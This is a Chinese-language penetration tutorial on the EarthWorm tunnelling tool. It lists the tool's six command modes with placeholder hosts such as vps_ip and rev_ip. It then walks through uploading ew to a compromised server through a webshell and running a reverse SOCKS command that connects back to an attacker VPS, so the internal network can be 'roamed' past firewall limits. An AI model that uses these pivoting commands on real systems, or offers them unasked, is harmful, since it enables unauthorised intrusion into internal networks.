前言
這章我們將學習如何透過一個webshell,進行內網穿透呢,就是要用到下面的工具earthworm,業內稱為ew內網神器
EW神器介紹
這個工具開發的團隊考慮到工具的殺傷性非常強,然後永久停止了更新,以下是一張示意圖
該工具能夠以“正向”、“反向”、“多級級聯”等方式打通一條網路隧道,直達網路深處,用蚯蚓獨有的手段突破網路限制,給防火牆鬆土。
工具包中提供了多種可執行檔案,以適用不同的作業系統,Linux、Windows、MacOS、Arm-Linux均被包括其內
EW的使用方法
該工具共有 6 種命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
./ew -s ssocksd -l 1080 //開啟正向socks服務
./ew -s rcsocks -l 1080 -e 8888 //監聽1080埠,1080接收的資料透過8888互動傳遞
./ew -s rssocks -d rev_ip -e 8888 //開啟反向socks服務。反向連線rev_ip的8888埠
./ew -s lcx_listen -l 1080 -e 8888 //監聽1080埠,1080接收的資料透過8888互動傳遞
./ew -s lcx_tran -l 1080 -f forward_ip -g8888 //監聽1080埠,1080接收的資料正向傳給forward_ip的8888埠
./ew -s lcx_slave -d vps_ip -e 8888 -f B_ip-g 9999 //作為中間角色,反向連線vps的8888,正向連線B的9999。打通兩者
0x02EW實戰內網穿透
1. 正向 SOCKS v5 伺服器(目標系統在公網)上傳了EW神器,透過指定引數啟動正向代理並設定好代理的1111埠
透過一個socks代理連線工具,直接這個正向代理伺服器即可
然後測試代理的可用性和延遲性,即可進行正向代理
2.反向 sock v5伺服器(目標系統在內網,能出網)透過拿到伺服器的webshell,上傳了EarthWorm內網穿透工具
在目標伺服器執行./ew -s rssocks -d vps-ip -e 1111 ,並反彈到公網主機的1111埠
可以看到目標伺服器成功反彈到公網的vps上,建立了反向代理
透過連線vps-IP的2222埠,測試反向代理的連線和延遲都正常
測試是可以把目標系統內網直接代理出來的,就可以開始愉快的內網漫遊了
如果目標不出網,那就透過能出網的伺服器建立代理中轉,直到可以訪問到不出網的伺服器